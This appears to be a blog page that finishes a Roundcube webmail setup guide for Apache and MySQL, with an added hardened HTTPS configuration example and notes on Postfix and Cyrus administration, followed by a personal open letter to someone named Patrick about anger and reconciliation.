sudo mv /tmp/roundcubemail-0.3-beta/* /var/www/webmail/
cd webmail

sudo chown www-data:www-data temp logs
cd /etc/apache2/mods-enabled
sudo ln -s ../mods-available/rewrite.load .
cd ..
sudo vi sites-available/default
# Add
<Directory /var/www/webmail>
Options Indexes FollowSymLinks MultiViews
AllowOverride Indexes
Order allow,deny
allow from all
</Directory>



Remove the last two lines from webmail/.htaccess.
Restart Apache (a restart, not a reload).
Then create the database and a dedicated database user for Roundcube:
mysql -u root -p

mysql> CREATE DATABASE roundcubemail /*!40101 CHARACTER SET utf8 COLLATE utf8_general_ci */;
Query OK, 1 row affected (0.00 sec)

mysql> GRANT ALL PRIVILEGES ON roundcubemail.* TO roundcube@localhost IDENTIFIED BY 'blarg';
Query OK, 0 rows affected (0.00 sec)


Visit http://whatever/webmail/installer/ and walk through the configuration.



Once everything is working, remove the installer:



sudo rm -rf /var/www/webmail/installer/
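The author leaves a better Apache configuration to the reader; as an added example (not from the original post), here is the same Directory block served only over HTTPS with directory listings turned off and the sensitive Roundcube directories denied. It assumes Apache 2.2 syntax as used above, mod_ssl enabled with a2enmod ssl, the Debian snakeoil certificate paths, DocumentRoot /var/www as on this page, and the placeholder hostname webmail.example.com.

```apache
# Added example, not the original post's configuration.
# Assumes: Apache 2.2 (Order/Allow syntax as on this page), mod_ssl
# enabled (sudo a2enmod ssl), Debian's snakeoil certificate paths,
# and the placeholder hostname webmail.example.com.

# Plain HTTP serves nothing; it only sends the client to HTTPS, so the
# Roundcube login form and the credentials typed into it never travel
# unencrypted.
<VirtualHost *:80>
    ServerName webmail.example.com
    Redirect permanent /webmail https://webmail.example.com/webmail
</VirtualHost>

<VirtualHost *:443>
    ServerName webmail.example.com
    DocumentRoot /var/www

    SSLEngine on
    # Replace the self-signed snakeoil pair with a certificate you trust.
    SSLCertificateFile    /etc/ssl/certs/ssl-cert-snakeoil.pem
    SSLCertificateKeyFile /etc/ssl/private/ssl-cert-snakeoil.key

    <Directory /var/www/webmail>
        # -Indexes: never list the contents of the webmail tree.
        # MultiViews dropped: content negotiation is not needed here.
        Options -Indexes +FollowSymLinks
        AllowOverride Indexes
        Order allow,deny
        Allow from all
    </Directory>

    # Nothing under these directories should be served to a browser:
    # config/ holds the database password, temp/ and logs/ hold
    # uploaded attachments and error logs.
    <DirectoryMatch "^/var/www/webmail/(config|temp|logs)">
        Order deny,allow
        Deny from all
    </DirectoryMatch>

    # The installer is deleted after setup (see above); deny it anyway
    # in case a later upgrade drops a new copy in place.
    <Directory /var/www/webmail/installer>
        Order deny,allow
        Deny from all
    </Directory>
</VirtualHost>
```

Put this in a new file under sites-available, enable it with a2ensite, and restart Apache rather than reloading it, as above.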



At this point I’m able to log in as both users, send and receive mail (DNS is properly configured), manage my folders etc. Note that no folders were created automatically by Cyrus so I had to make them myself, at least the ones that Roundcube was looking for. I also had to create the Identities for each user but that was easy.



Conclusion



The end product is a mail system that’s simple to use, works well, and is easy to administer. New domains are added in Postfix in the main.cf, vmailbox, and virtual files (don’t forget postmap). Mailboxes are managed with cyradm. Passwords are managed with saslpasswd2.



Special thanks to directory-services ninja (among other things) subcon from slapd.info. In addition to having gone through this frontier before me, he also does things with LDAP that would require normal people to use Celtic runes and goat's blood.

Sunday, March 1, 2009

A Letter to Patrick

I write this to you here because I don’t think you’ll be reasonable if I address you directly. You feel that we’re responsible for what’s happened to you recently and you’re committed to “causing us hell”. I must admit, I initially felt stress and frustration in dealing with your efforts to be disruptive. My emotions have changed as your efforts have persisted and what they’ve settled on is sadness.



I’d like to share this sadness with you with the hopes that you’ll see your situation from a different perspective. I used to be very angry at the world around me. I was angry about how I felt, the position I was in, and the fact that despite my greatest hopes, nothing was coming along to change that. This sense of being “stuck” compounded the anger further. I was on a path that wasn’t changing and no one was going to change it for me.



I wanted to change but I didn’t realize that it wasn’t going to just happen. Luckily, my best friend showed me the path I was on and convinced me that the source of the problem was my anger, looping back on itself. When I took responsibility for my situation I was able to start the long and arduous process of becoming free.



With this in mind I'm sad in a broad sense to see you in a similar situation, alienating those who might help you find a better path. I'm sad because I was lucky enough that I didn't sabotage my means of breaking free, and I fear that you are not so lucky.



At a more granular level, I’m saddened that we couldn’t work out our differences as mature, enlightened people. I do not, however, react positively to aggression. At best I just become dismissive but remain polite. If you had been willing to communicate we might have become friends and maybe I could help you find a better way. If the opportunity arose I don’t know that I could. That kind of insight is not my forte. But I stick by my friends and do the best I can. I’m sad that I can’t see you amongst my friends.



I'm sad that you chose to deal with your problem by attempting to bend others to your will rather than compromising. You were so blinded by anger and desire for revenge that you could only thrash about and, like being in quicksand, only sank deeper. I'm sad because your anger controls you and keeps you from being free.



I'm sad because you're a slave. You are a slave to your anger, so you yank on your chains. Your efforts to break the chains only make you tired and make the chains heavier. I'm sad because you don't see that your chains have no locks and it's your force that keeps the retaining pin in place. Maybe one day you'll find this sadness in yourself. Maybe you'll let this sadness overwhelm you and quench your anger. Maybe this sadness will let you rest in the chains and, with the tension relieved, they'll simply fall off.



I don’t know if you’ll read this. I don’t think we’ll ever speak again. I would like you to know that I know what deep, ceaseless anger feels like. I sincerely hope that you can find a way out.